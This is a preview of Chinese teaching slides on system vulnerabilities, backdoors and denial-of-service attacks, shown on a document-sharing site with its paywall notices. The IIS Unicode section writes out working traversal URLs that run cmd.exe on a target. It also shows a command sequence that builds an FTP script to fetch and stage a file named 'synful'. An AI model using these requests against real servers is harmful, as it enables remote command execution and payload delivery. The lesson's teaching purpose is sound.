- 1、本文档共36页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
系统漏洞和后门系统漏洞是程序中无意造成的缺陷,它形成了一个不被注意的通道。漏洞也指无意的配置错误,如使用默认服务器配置。后门是一个在操作系统或程序中无证明文件的通道,通常是由软件开发人员故意放置在那里的,以便他们能够快速对产品进行支持。 IIS UNICODE 漏洞NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执行某些web根目录以外的文件。IIS UNICODE 漏洞对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如%c1%hh或者%c0%hh,它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00= %hh 0x40的话,采用的解码的格式与下面的格式类似:%c1%hh - (0xc1 - 0xc0) * 0x40 + 0xhh%c0%hh - (0xc0 - 0xc0) * 0x40 + 0xhhIIS UNICODE 漏洞因此,利用这种编码,我们可以构造很多字符,例如: %c1%1c - (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = ‘/‘ %c0%2f - (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = ‘ ‘ 攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。 IIS UNICODE 漏洞如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能列出当前目录的内容:http://目标主机/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir利用这个漏洞查看系统文件内容也是可能的:http://目标主机/a.asp/..%c1%1c../..%c1%1c../winnt/win.iniIIS漏洞/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/ccc.exe?/c+echo+open%3e+getfile/scripts/ccc.exe?/c+echo+open+getfile/scripts/ccc.exe?/c+type+getfile/scripts/ccc.exe?/c+echo+11%3e%3e+getfile/scripts/ccc.exe?/c+echo+11+getfile/scripts/ccc.exe?/c+echo+administrator%3e%3e+getfile/scripts/ccc.exe?/c+echo+administrator+getfile/scripts/ccc.exe?/c+echo+123456%3e%3e+getfile/scripts/ccc.exe?/c+echo+123456+getfile/scripts/ccc.exe?/c+echo+get+synful+getfile/scripts/ccc.exe?/c+echo+quit%3e%3e+getfile/scripts/ccc.exe?/c+echo+quit+getfile/scripts/ccc.exe?/c+ftp+-s:getfile拒绝服务攻击DoS(Denial of Service),其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。拒绝服务攻击带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终计算机无法再处理合法用户的请求 分布式拒绝服务攻击(DDoS,Distributed Denial of Service) 指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝
您可能关注的文档
- 最新医学资料肱骨近端骨折治疗与康复ppt.pptx
- 房地产开发经营与管理.pptx
- 精选资料从语文新课标修订稿看语文教育坚持与发展.pptx
- 思想政治教育学原理.pptx
- 公司治理中法律风险体系建设实务.pptx
- 高中历史一轮复习人民版必修二专题一古代中国手工业经济共20张.pptx
- 初二政治上学期竞争合作最新.pptx
- 管理会计概述复习资料.pptx
- 最新营销传播市场战略与品牌建设.pptx
- 强企业入职培训第讲专业形象.pptx
- 湖北省汉川市第二中学2024_2025学年高一数学5月月考试题.doc
- 吉林省吉林市2024_2025学年高一化学上学期期末考试试题扫描版.doc
- 2024_2025学年高中生物学业分层测评4含解析中图版选修3.doc
- 2025届中考英语二轮复习知识讲与练第23课介词与数词试题.doc
- 天津市耀华中学2024_2025学年高一生物下学期期末考试试题.doc
- 河北省唐山市滦南县第二中学2024_2025学年高一语文上学期期中试题扫描版.doc
- 江苏姜堰张甸港口初中2024_2025学年九年级语文上第一次月考试卷.doc
- 广东省江门市第二中学2024_2025学年高二化学12月月考试题文.doc
- 新疆乌鲁木齐市第四中学2024_2025学年高二生物下学期期末考试试题.doc
- 四川省泸州市泸县第一中学2024_2025学年高一生物下学期第一次月考试题含解析.doc
文档评论(0)